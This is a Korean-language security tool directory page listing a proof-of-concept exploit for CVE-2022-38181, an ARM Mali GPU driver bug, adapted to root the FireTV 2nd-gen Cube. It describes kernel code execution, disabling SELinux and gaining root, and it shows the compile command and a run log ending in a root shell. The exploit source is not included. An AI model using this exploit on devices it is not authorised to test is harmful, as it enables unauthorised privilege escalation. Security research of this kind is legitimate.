Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE_2022_38181_Raven — CVE-2022-38181 POC for FireTV 2nd gen Cube (raven) | Kitploit
도구/GitHubGitHub/pro-me3us/cve_2022_38181_raven
Android SecurityEmbedded Systems SecurityPrivilege EscalationVulnerability AnalysisExploitationBinary Exploitation
GitHubpro-me3us/cve_2022_38181_raven

CVE_2022_38181_Raven

CVE-2022-38181 POC for FireTV 2nd gen Cube (raven)

저장소 보기
791년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

FireTV 2세대 Cube용 CVE-2022-38181 익스플로잇

이 프로젝트는 보안 연구원 Man Yue Mo의 Pixel 6 POC for CVE_2022_38181를 포크한 것입니다. 취약점에 대한 자세한 분석은 여기에서 확인할 수 있습니다. FireOS의 32비트 사용자 공간과 2세대 Cube의 구형 Bifrost 드라이버(r16p0) 및 Linux 커널(4.9.113) 버전을 반영하여 변경되었습니다. 이 POC는 ARM Mali 커널 드라이버의 버그를 악용하여 임의의 커널 코드 실행을 달성한 후 SELinux를 비활성화하고 루트 권한을 획득합니다.

다음 명령어를 사용하여 ndk-21에서 clang으로 컴파일했습니다:

root@kitploit:~
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o raven_shrinker

최고의 안정성을 위해 Cube 부팅 후 30~90초 내에 익스플로잇을 실행해야 합니다.

root@kitploit:~
raven:/ $ /data/local/tmp/raven_shrinker
fingerprint: Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys
failed, retry.
failed, retry.
failed, retry.
failed, retry.
region freed 80
alias gpu va 100c85000
read 0
cleanup flush region
release_mem_pool
jit_freed
jit_free commit: 2 0
Found freed_idx 2
Found pgd 23, 100cce000
overwrite addr : 104100634 634
overwrite addr : 104300634 634
overwrite addr : 1041001c4 1c4
overwrite addr : 1043001c4 1c4
result 50
raven:/ # 
도구 다운로드